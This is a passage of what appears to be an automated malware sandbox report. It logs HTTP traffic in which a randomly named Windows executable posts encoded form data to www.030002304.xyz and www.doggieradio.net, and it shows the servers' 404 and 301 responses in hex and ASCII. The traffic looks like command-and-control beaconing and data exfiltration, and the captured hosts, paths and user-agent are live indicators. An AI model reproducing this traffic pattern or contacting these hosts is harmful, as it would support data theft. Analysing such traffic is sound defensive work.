                                                                                                                                                                Location: https://www.bayarcepat19.click/x7ji/?nhl=VbX4XoU1axPwTLIf98pUGPIzQL60g31CACrHzmj3o8Yh1t/lPrcBk6uAM4jdHwr2Bp5gqY7NYKc3aa2dAjtLrrS76KgS6f/xOF9OiJ7sHgK1x6zEV9Cyr40=&9X=EvKH2xeP-DpP307P
                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ltU7eQEOt4%2BPqPNxvFTLwxIWnsaSwzvLLEhHbTZFNpkTUcVUIw2y1RI9r65jbh2j%2FCiifdUKlhbfSrblTy85CWmmuI%2FIiuHxvmyl6C5jdKhjoyl1%2FQtfUA0%2BvIp818t8ZvAT%2BHZO0qZg"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                Speculation-Rules: "/cdn-cgi/speculation"
                                                                                                                                                                Server: cloudflare
                                                                                                                                                                CF-RAY: 8cfde23fcaed8c5f-EWR
                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                13192.168.11.304983465.21.196.90806156C:\Program Files (x86)\MGvNXdFMRgmwCGLFFGVRdmtvlfIBdBIASMDzMzvqfNweoHyYVzlRonhskxe\SjhnWvlTMw.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Oct 9, 2024 13:03:28.574872971 CEST610OUTPOST /f06i/ HTTP/1.1
                                                                                                                                                                Accept: */*
                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                Host: www.030002304.xyz
                                                                                                                                                                Cache-Control: max-age=0
                                                                                                                                                                Content-Length: 200
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Connection: close
                                                                                                                                                                Origin: http://www.030002304.xyz
                                                                                                                                                                Referer: http://www.030002304.xyz/f06i/
                                                                                                                                                                User-Agent: Opera/9.80 (S60; SymbOS; Opera Mobi/1209; U; fr) Presto/2.5.28 Version/10.1
                                                                                                                                                                Data Raw: 6e 68 6c 3d 74 33 6b 79 32 4f 37 4a 4c 6d 46 64 32 51 49 43 43 51 69 4b 52 62 74 31 68 6d 6f 34 4d 31 53 75 58 5a 7a 38 38 54 74 33 74 33 2f 6d 6a 31 6e 59 32 74 4a 31 42 6f 43 67 44 37 33 4b 76 55 4f 6c 73 6a 57 4d 45 65 55 53 76 52 78 41 73 53 43 39 76 52 4a 48 44 63 75 35 74 6a 76 4c 66 4e 69 30 58 74 4f 67 66 78 63 47 46 78 32 31 37 38 2b 69 4a 71 48 65 4a 73 32 65 4f 31 4a 61 5a 47 7a 47 51 65 74 65 64 72 66 33 78 2b 58 66 48 44 53 4a 6a 4d 54 4f 74 55 4b 37 69 76 39 64 77 2f 62 46 7a 59 4e 6a 55 79 59 39 68 33 34 44 4a 6b 5a 70 56 61 66 65 51 45 7a 52 48 4d 4d 2b 74 65 38 72 74 67 3d 3d
                                                                                                                                                                Data Ascii: nhl=t3ky2O7JLmFd2QICCQiKRbt1hmo4M1SuXZz88Tt3t3/mj1nY2tJ1BoCgD73KvUOlsjWMEeUSvRxAsSC9vRJHDcu5tjvLfNi0XtOgfxcGFx2178+iJqHeJs2eO1JaZGzGQetedrf3x+XfHDSJjMTOtUK7iv9dw/bFzYNjUyY9h34DJkZpVafeQEzRHMM+te8rtg==
                                                                                                                                                                Oct 9, 2024 13:03:28.767903090 CEST1032INHTTP/1.1 404 Not Found
                                                                                                                                                                Connection: close
                                                                                                                                                                cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                                                                                pragma: no-cache
                                                                                                                                                                content-type: text/html
                                                                                                                                                                content-length: 796
                                                                                                                                                                date: Wed, 09 Oct 2024 11:03:28 GMT
                                                                                                                                                                vary: User-Agent
                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                                                                                                                Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                14192.168.11.304983565.21.196.90806156C:\Program Files (x86)\MGvNXdFMRgmwCGLFFGVRdmtvlfIBdBIASMDzMzvqfNweoHyYVzlRonhskxe\SjhnWvlTMw.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Oct 9, 2024 13:03:31.305915117 CEST630OUTPOST /f06i/ HTTP/1.1
                                                                                                                                                                Accept: */*
                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                Host: www.030002304.xyz
                                                                                                                                                                Cache-Control: max-age=0
                                                                                                                                                                Content-Length: 220
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Connection: close
                                                                                                                                                                Origin: http://www.030002304.xyz
                                                                                                                                                                Referer: http://www.030002304.xyz/f06i/
                                                                                                                                                                User-Agent: Opera/9.80 (S60; SymbOS; Opera Mobi/1209; U; fr) Presto/2.5.28 Version/10.1
                                                                                                                                                                Data Raw: 6e 68 6c 3d 74 33 6b 79 32 4f 37 4a 4c 6d 46 64 35 51 59 43 42 7a 4b 4b 5a 62 74 30 71 47 6f 34 47 56 53 71 58 5a 76 38 38 57 56 6e 73 46 4c 6d 6a 58 50 59 34 4a 39 31 49 34 43 67 4c 62 33 50 68 30 4f 2b 73 6a 62 76 45 65 59 53 76 53 4e 41 73 58 6d 39 76 67 4a 47 52 38 75 37 72 6a 76 56 43 39 69 30 58 74 4f 67 66 78 4a 74 46 77 65 31 34 4d 75 69 4a 50 7a 5a 41 4d 32 64 59 6c 4a 61 64 47 7a 4b 51 65 73 39 64 70 37 52 78 34 54 66 48 44 69 4a 69 5a 2f 50 6a 55 4b 39 76 50 38 72 2b 37 43 76 2b 4b 6c 75 65 79 6b 47 75 6e 49 65 49 7a 6f 7a 49 5a 72 63 44 6b 50 38 62 4e 68 57 76 63 39 77 77 67 59 30 54 6e 33 2f 34 5a 61 49 6d 62 45 72 6b 78 71 32 43 6f 34 3d
                                                                                                                                                                Data Ascii: nhl=t3ky2O7JLmFd5QYCBzKKZbt0qGo4GVSqXZv88WVnsFLmjXPY4J91I4CgLb3Ph0O+sjbvEeYSvSNAsXm9vgJGR8u7rjvVC9i0XtOgfxJtFwe14MuiJPzZAM2dYlJadGzKQes9dp7Rx4TfHDiJiZ/PjUK9vP8r+7Cv+KlueykGunIeIzozIZrcDkP8bNhWvc9wwgY0Tn3/4ZaImbErkxq2Co4=
                                                                                                                                                                Oct 9, 2024 13:03:31.497334957 CEST1032INHTTP/1.1 404 Not Found
                                                                                                                                                                Connection: close
                                                                                                                                                                cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                                                                                pragma: no-cache
                                                                                                                                                                content-type: text/html
                                                                                                                                                                content-length: 796
                                                                                                                                                                date: Wed, 09 Oct 2024 11:03:31 GMT
                                                                                                                                                                vary: User-Agent
                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                                                                                                                Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                15192.168.11.304983665.21.196.90806156C:\Program Files (x86)\MGvNXdFMRgmwCGLFFGVRdmtvlfIBdBIASMDzMzvqfNweoHyYVzlRonhskxe\SjhnWvlTMw.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Oct 9, 2024 13:03:34.045150042 CEST2578OUTPOST /f06i/ HTTP/1.1
                                                                                                                                                                Accept: */*
                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                Host: www.030002304.xyz
                                                                                                                                                                Cache-Control: max-age=0
                                                                                                                                                                Content-Length: 3336
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Connection: close
                                                                                                                                                                Origin: http://www.030002304.xyz
                                                                                                                                                                Referer: http://www.030002304.xyz/f06i/
                                                                                                                                                                User-Agent: Opera/9.80 (S60; SymbOS; Opera Mobi/1209; U; fr) Presto/2.5.28 Version/10.1
                                                                                                                                                                Data Raw: 6e 68 6c 3d 74 33 6b 79 32 4f 37 4a 4c 6d 46 64 35 51 59 43 42 7a 4b 4b 5a 62 74 30 71 47 6f 34 47 56 53 71 58 5a 76 38 38 57 56 6e 73 46 7a 6d 67 6d 76 59 33 4f 68 31 53 34 43 67 46 37 33 4f 68 30 4f 7a 73 6a 43 6d 45 65 46 76 76 55 42 41 71 30 65 39 6d 31 70 47 62 38 75 37 6d 44 76 55 66 4e 6a 30 58 72 76 70 66 78 5a 74 46 77 65 31 34 50 47 69 5a 4b 48 5a 47 4d 32 65 4f 31 4a 4f 5a 47 7a 6d 51 65 30 44 64 70 2b 73 78 36 7a 66 48 78 61 4a 6a 76 72 50 6a 55 4b 39 30 2f 38 32 2b 2b 61 75 2b 4c 4e 79 65 7a 73 77 70 58 63 65 4a 33 4a 53 56 59 43 4b 51 46 76 49 47 2f 5a 79 6d 63 70 37 32 78 70 4a 53 56 48 47 70 61 36 76 6a 39 51 2b 68 68 76 78 64 4d 50 6e 48 63 6e 6e 6b 63 6c 6c 31 6e 30 38 70 59 7a 57 4a 41 55 6c 70 58 46 72 4d 64 63 66 6a 78 71 77 42 6d 71 50 34 6c 55 56 53 57 35 45 36 37 41 65 64 6a 57 31 56 66 4e 47 63 48 42 59 57 52 75 34 50 64 78 7a 62 38 62 78 6c 62 64 70 67 38 74 6c 44 62 51 7a 73 58 65 4d 2f 34 49 6a 30 6c 33 6e 6b 46 7a 5a 53 50 33 4e 6f 30 6c 7a 46 53 57 74 72 41 4b 57 64 4a [TRUNCATED]
                                                                                                                                                                Data Ascii: nhl=t3ky2O7JLmFd5QYCBzKKZbt0qGo4GVSqXZv88WVnsFzmgmvY3Oh1S4CgF73Oh0OzsjCmEeFvvUBAq0e9m1pGb8u7mDvUfNj0XrvpfxZtFwe14PGiZKHZGM2eO1JOZGzmQe0Ddp+sx6zfHxaJjvrPjUK90/82++au+LNyezswpXceJ3JSVYCKQFvIG/Zymcp72xpJSVHGpa6vj9Q+hhvxdMPnHcnnkcll1n08pYzWJAUlpXFrMdcfjxqwBmqP4lUVSW5E67AedjW1VfNGcHBYWRu4Pdxzb8bxlbdpg8tlDbQzsXeM/4Ij0l3nkFzZSP3No0lzFSWtrAKWdJDE1IUEb7Pdnx7QEt+YNxAiuMaYqA4hHse2Ytvu7o30vNRmrkdu/wbDisnjFKol4s9w/ddnSuUXKqnVuzHPG6m5x5xMAxa3EL0D1Yz0sY2+E2i6/c3X5sFOkoK+wKG0GKCYRQLMMaJuZbwfMjimhBP+iO89NkH9grHzjWKSCoi9gtEPrgCxymwv/Q139GkocUN7rBRLxhN0D4dwUKnkwZHBbmsUcdraDt8p+7yFKeS3cN0NTAVawLgCiS5OL8jDuQZLLSRLSOka20PtoZ48AUj1FAEWX/PF+u3AN68SwxbVYpryA6HQlrJVm49W7nJA8+E5mqwtej+Q7U+xTvcw0DAy1bI8TFcNccC0CyKlK4tzFotKMyh2ww2Pst22nmnOmUH1y+KncvpjR1cbz7fzYVQRilnqPwDyigEVrQt2lKYEcnLq5OiEQLis8WHQK1k2CkHEii4xKGhk6/w/rDL6ttBpB7f3g5X9cZ9WxlGDx11LmBKVrh87aRpwKC9Hxbtkw6oVOHO6mFW8aHqsXAKIhwCUl28B0hgBrtSZFHAmAg9VNu2lhe80q2T/3lCD0AgGrBbSRY9IAFlbFftDuJdI6DHus8h6OM9JtPAGMRKHPKR69Y+F62Y+oyvVhrwTiGGBhtDDI+Q+CbdM9ZjIQbHHYRwE8jr3RapeR1WI [TRUNCATED]
                                                                                                                                                                Oct 9, 2024 13:03:34.045167923 CEST1169OUTData Raw: 65 54 49 57 67 64 73 6f 39 6e 6d 31 30 61 78 44 7a 69 77 7a 6f 57 46 37 63 65 5a 6d 38 39 59 52 76 54 4b 68 70 51 39 69 63 4c 42 49 6b 48 43 51 62 39 38 43 4d 51 78 39 52 48 47 68 4e 76 75 36 72 31 69 4e 4b 48 69 43 37 34 68 64 38 54 6b 78 7a 62
                                                                                                                                                                Data Ascii: eTIWgdso9nm10axDziwzoWF7ceZm89YRvTKhpQ9icLBIkHCQb98CMQx9RHGhNvu6r1iNKHiC74hd8TkxzbACx4rcpJcJNbm8O9vvaNgdrC0HKHvKYHL8LE/1t/Z3hWtVjteEotmCGlam+CQOL6b9/91lGcZTUP8LAfWEQpR6RnOb0kiy+C2Yft01VtVOIN/eqeo9pY1vVhTPDSI4hjKAjXkSA4HUgsF+VDb1GMoZJR7mzxfQtGt
                                                                                                                                                                Oct 9, 2024 13:03:34.242644072 CEST1032INHTTP/1.1 404 Not Found
                                                                                                                                                                Connection: close
                                                                                                                                                                cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                                                                                pragma: no-cache
                                                                                                                                                                content-type: text/html
                                                                                                                                                                content-length: 796
                                                                                                                                                                date: Wed, 09 Oct 2024 11:03:34 GMT
                                                                                                                                                                vary: User-Agent
                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                                                                                                                Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                16192.168.11.304983765.21.196.90806156C:\Program Files (x86)\MGvNXdFMRgmwCGLFFGVRdmtvlfIBdBIASMDzMzvqfNweoHyYVzlRonhskxe\SjhnWvlTMw.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Oct 9, 2024 13:03:36.801964998 CEST347OUTGET /f06i/?9X=EvKH2xeP-DpP307P&nhl=g1MS1+fiN19fuwYlcBKOU4UzmmsLW0eBYO/90R9nimGtqEGAgI0kE5yyF7WRrE+n+De2SPMKz1ZHlS6i60EYe6+HnhjgGN2ua7X3RkxuKgzxjrOTLKTNX9U= HTTP/1.1
                                                                                                                                                                Accept: */*
                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                Host: www.030002304.xyz
                                                                                                                                                                Connection: close
                                                                                                                                                                User-Agent: Opera/9.80 (S60; SymbOS; Opera Mobi/1209; U; fr) Presto/2.5.28 Version/10.1
                                                                                                                                                                Oct 9, 2024 13:03:37.015255928 CEST1032INHTTP/1.1 404 Not Found
                                                                                                                                                                Connection: close
                                                                                                                                                                cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                                                                                pragma: no-cache
                                                                                                                                                                content-type: text/html
                                                                                                                                                                content-length: 796
                                                                                                                                                                date: Wed, 09 Oct 2024 11:03:36 GMT
                                                                                                                                                                vary: User-Agent
                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                                                                                                                Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                17192.168.11.30498383.33.130.190806156C:\Program Files (x86)\MGvNXdFMRgmwCGLFFGVRdmtvlfIBdBIASMDzMzvqfNweoHyYVzlRonhskxe\SjhnWvlTMw.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Oct 9, 2024 13:03:42.360498905 CEST616OUTPOST /0r1y/ HTTP/1.1
                                                                                                                                                                Accept: */*
                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                Host: www.doggieradio.net
                                                                                                                                                                Cache-Control: max-age=0
                                                                                                                                                                Content-Length: 200
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Connection: close
                                                                                                                                                                Origin: http://www.doggieradio.net
                                                                                                                                                                Referer: http://www.doggieradio.net/0r1y/
                                                                                                                                                                User-Agent: Opera/9.80 (S60; SymbOS; Opera Mobi/1209; U; fr) Presto/2.5.28 Version/10.1
                                                                                                                                                                Data Raw: 6e 68 6c 3d 67 4b 67 54 63 39 33 34 5a 35 79 33 4f 45 49 51 32 75 75 66 53 36 57 33 67 44 59 50 6f 2b 57 34 64 6a 36 79 38 43 38 63 74 41 6a 4a 77 31 6d 35 47 2f 6e 59 71 71 4f 61 32 46 41 37 37 71 41 6f 59 32 51 30 64 6e 37 78 58 6e 62 68 71 53 76 2f 76 6e 5a 42 46 74 6e 2b 31 71 37 74 55 32 36 45 79 74 34 38 69 58 73 61 6b 67 6c 53 5a 68 4b 4f 65 73 59 75 66 4e 37 6b 2f 42 7a 4e 35 44 4c 36 69 46 54 63 2f 42 2f 42 63 78 71 62 6a 41 4f 59 79 34 68 35 4b 4d 67 67 62 73 4f 53 59 39 61 68 4c 6e 46 2f 58 2b 4f 76 4f 54 77 64 73 57 50 50 78 56 38 65 6e 30 39 59 6b 6c 45 38 59 71 30 39 78 67 3d 3d
                                                                                                                                                                Data Ascii: nhl=gKgTc934Z5y3OEIQ2uufS6W3gDYPo+W4dj6y8C8ctAjJw1m5G/nYqqOa2FA77qAoY2Q0dn7xXnbhqSv/vnZBFtn+1q7tU26Eyt48iXsakglSZhKOesYufN7k/BzN5DL6iFTc/B/BcxqbjAOYy4h5KMggbsOSY9ahLnF/X+OvOTwdsWPPxV8en09YklE8Yq09xg==


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                18192.168.11.30498393.33.130.190806156C:\Program Files (x86)\MGvNXdFMRgmwCGLFFGVRdmtvlfIBdBIASMDzMzvqfNweoHyYVzlRonhskxe\SjhnWvlTMw.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Oct 9, 2024 13:03:44.990825891 CEST636OUTPOST /0r1y/ HTTP/1.1
                                                                                                                                                                Accept: */*
                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                Host: www.doggieradio.net
                                                                                                                                                                Cache-Control: max-age=0
                                                                                                                                                                Content-Length: 220
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Connection: close
                                                                                                                                                                Origin: http://www.doggieradio.net
                                                                                                                                                                Referer: http://www.doggieradio.net/0r1y/
                                                                                                                                                                User-Agent: Opera/9.80 (S60; SymbOS; Opera Mobi/1209; U; fr) Presto/2.5.28 Version/10.1
                                                                                                                                                                Data Raw: 6e 68 6c 3d 67 4b 67 54 63 39 33 34 5a 35 79 33 4f 6c 34 51 30 49 6d 66 56 61 57 30 76 6a 59 50 6e 65 57 38 64 6a 32 79 38 47 46 48 74 57 54 4a 33 58 4f 35 48 2b 6e 59 70 71 4f 61 75 56 42 77 31 4b 41 64 59 32 63 38 64 6d 48 78 58 6a 4c 68 71 53 2f 2f 76 55 78 43 44 39 6e 67 73 61 37 56 62 57 36 45 79 74 34 38 69 58 34 38 6b 68 42 53 5a 51 36 4f 59 4e 59 74 58 74 37 6e 38 42 7a 4e 7a 6a 4c 32 69 46 53 2f 2f 42 50 6e 63 7a 43 62 6a 41 2b 59 31 70 68 36 45 4d 68 6c 57 4d 50 75 5a 76 48 45 4f 33 35 35 65 73 53 41 45 53 41 33 70 42 2b 56 73 57 49 63 30 55 42 31 34 6b 70 55 61 6f 31 6d 73 6c 42 55 75 46 62 43 57 49 48 4f 74 6f 71 2b 41 6c 55 58 48 73 73 3d
                                                                                                                                                                Data Ascii: nhl=gKgTc934Z5y3Ol4Q0ImfVaW0vjYPneW8dj2y8GFHtWTJ3XO5H+nYpqOauVBw1KAdY2c8dmHxXjLhqS//vUxCD9ngsa7VbW6Eyt48iX48khBSZQ6OYNYtXt7n8BzNzjL2iFS//BPnczCbjA+Y1ph6EMhlWMPuZvHEO355esSAESA3pB+VsWIc0UB14kpUao1mslBUuFbCWIHOtoq+AlUXHss=


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
